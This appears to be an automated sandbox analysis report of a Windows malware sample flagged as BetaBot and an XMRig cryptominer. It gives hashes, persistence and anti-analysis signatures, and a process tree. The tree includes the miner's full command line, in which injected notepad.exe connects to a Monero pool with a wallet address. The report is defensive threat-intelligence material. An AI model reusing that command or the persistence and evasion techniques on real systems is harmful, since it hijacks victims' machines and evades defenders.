Analysis

  • max time kernel: 152s
  • max time network: 157s
  • platform: windows10-2004_x64
  • resource: win10v2004-20220414-en
  • submitted: 07-07-2022 23:58

General

  • Target: 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
  • Size: 2.1MB
  • MD5: 65c47159ad930504229825ef323aecf8
  • SHA1: 26974a01d0815a6f5cc63b34527a1a6a91ba2705
  • SHA256: 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16
  • SHA512: d2ccc975b97380f2c3d4fdc0d403f0b150b4e34eedc6b1e3f4d4d1ff773a6bb0d7dcb48cccfd83e8ac06ec2972006da9bc21481cadf02563dcc17cbe89888d77

Malware Config

Signatures

  • BetaBot

    Beta Bot is a Trojan that infects computers and disables Antivirus.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies firewall policy service 2 TTPs 4 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Sets file execution options in registry 2 TTPs 4 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
  • Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
    "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
    1⤵
    • Drops startup file
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1372
    • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
      "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
      2⤵
      • Sets file execution options in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Checks processor information in registry
      • Suspicious behavior: MapViewOfSection
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      PID:3504
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        3⤵
        • Modifies firewall policy service
        • Sets file execution options in registry
        • Checks BIOS information in registry
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies Internet Explorer Protected Mode
        • Modifies Internet Explorer Protected Mode Banner
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:2000
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1168
          4⤵
          • Program crash
          PID:4724
    • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
      "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
      2⤵
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Windows\notepad.exe
        "C:\Windows\notepad.exe" -o pool.monero.hashvault.pro:5555:80 -u 48g2oLrkRG5JtnYA1pUukrYHgsu6aBqGTVxzZx6av6wvhBtgTHrKquWXMY2BJNnxs3aqj3U5RMnoZ6HaZYRMUouU8ke7kC4 -p trainwreck -v 0 -t 2
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4424
    • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
      "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2468
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\SysWOW64\msiexec.exe
        3⤵
        • Modifies WinLogon for persistence
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:2240
        • C:\ProgramData\windervt\3a9uw5a3e.exe
          /prstb
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:3876
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2000 -ip 2000
    1⤵
      PID:1920

    Network

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\ProgramData\windervt\3a9uw5a3e.exe
      Filesize: 2.1MB
      MD5: 65c47159ad930504229825ef323aecf8
      SHA1: 26974a01d0815a6f5cc63b34527a1a6a91ba2705
      SHA256: 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16
      SHA512: d2ccc975b97380f2c3d4fdc0d403f0b150b4e34eedc6b1e3f4d4d1ff773a6bb0d7dcb48cccfd83e8ac06ec2972006da9bc21481cadf02563dcc17cbe89888d77

    • memory/1372-139-0x00000000008B0000-0x00000000008B7000-memory.dmp (Filesize: 28KB)
    • memory/1372-132-0x00000000008B0000-0x00000000008B7000-memory.dmp (Filesize: 28KB)
    • memory/2000-160-0x0000000000000000-mapping.dmp
    • memory/2000-167-0x00000000012B0000-0x0000000001535000-memory.dmp (Filesize: 2.5MB)
    • memory/2000-162-0x0000000000B70000-0x0000000000FA3000-memory.dmp (Filesize: 4.2MB)
    • memory/2000-163-0x00000000012B0000-0x0000000001535000-memory.dmp (Filesize: 2.5MB)
    • memory/2000-165-0x00000000012B0000-0x0000000001535000-memory.dmp (Filesize: 2.5MB)
    • memory/2240-164-0x00000000028C0000-0x0000000002B45000-memory.dmp (Filesize: 2.5MB)
    • memory/2240-157-0x0000000000000000-mapping.dmp
    • memory/2240-166-0x00000000028C0000-0x0000000002B45000-memory.dmp (Filesize: 2.5MB)
    • memory/2468-152-0x0000000000400000-0x00000000004AA000-memory.dmp (Filesize: 680KB)
    • memory/2468-143-0x0000000000400000-0x00000000004AA000-memory.dmp (Filesize: 680KB)
    • memory/2468-140-0x0000000000400000-0x00000000004AA000-memory.dmp (Filesize: 680KB)
    • memory/2468-137-0x0000000000000000-mapping.dmp
    • memory/2468-158-0x0000000000400000-0x00000000004AA000-memory.dmp (Filesize: 680KB)
    • memory/3036-142-0x0000000000400000-0x00000000004B7000-memory.dmp (Filesize: 732KB)
    • memory/3036-149-0x0000000000400000-0x00000000004B7000-memory.dmp (Filesize: 732KB)
    • memory/3036-135-0x0000000000000000-mapping.dmp
    • memory/3036-138-0x0000000000400000-0x00000000004B7000-memory.dmp (Filesize: 732KB)
    • memory/3504-155-0x0000000002880000-0x000000000288C000-memory.dmp (Filesize: 48KB)
    • memory/3504-141-0x0000000000400000-0x0000000000435000-memory.dmp (Filesize: 212KB)
    • memory/3504-136-0x0000000000400000-0x0000000000435000-memory.dmp (Filesize: 212KB)
    • memory/3504-133-0x0000000000000000-mapping.dmp
    • memory/3504-154-0x00000000006D0000-0x00000000006DD000-memory.dmp (Filesize: 52KB)
    • memory/3504-159-0x0000000000BC0000-0x0000000000C26000-memory.dmp (Filesize: 408KB)
    • memory/3504-151-0x0000000000BC0000-0x0000000000C26000-memory.dmp (Filesize: 408KB)
    • memory/3504-161-0x0000000000BC0000-0x0000000000C26000-memory.dmp (Filesize: 408KB)
    • memory/3504-147-0x0000000000400000-0x0000000000435000-memory.dmp (Filesize: 212KB)
    • memory/3504-134-0x0000000000400000-0x0000000000435000-memory.dmp (Filesize: 212KB)
    • memory/3876-168-0x0000000000000000-mapping.dmp
    • memory/4424-148-0x0000000000400000-0x00000000004DA000-memory.dmp (Filesize: 872KB)
    • memory/4424-145-0x00000000004D3D30-mapping.dmp
    • memory/4424-144-0x0000000000400000-0x00000000004DA000-memory.dmp (Filesize: 872KB)
    • memory/4424-146-0x0000000000400000-0x00000000004DA000-memory.dmp (Filesize: 872KB)
    • memory/4424-150-0x0000000000400000-0x00000000004DA000-memory.dmp (Filesize: 872KB)
    • memory/4424-156-0x0000000000400000-0x00000000004DA000-memory.dmp (Filesize: 872KB)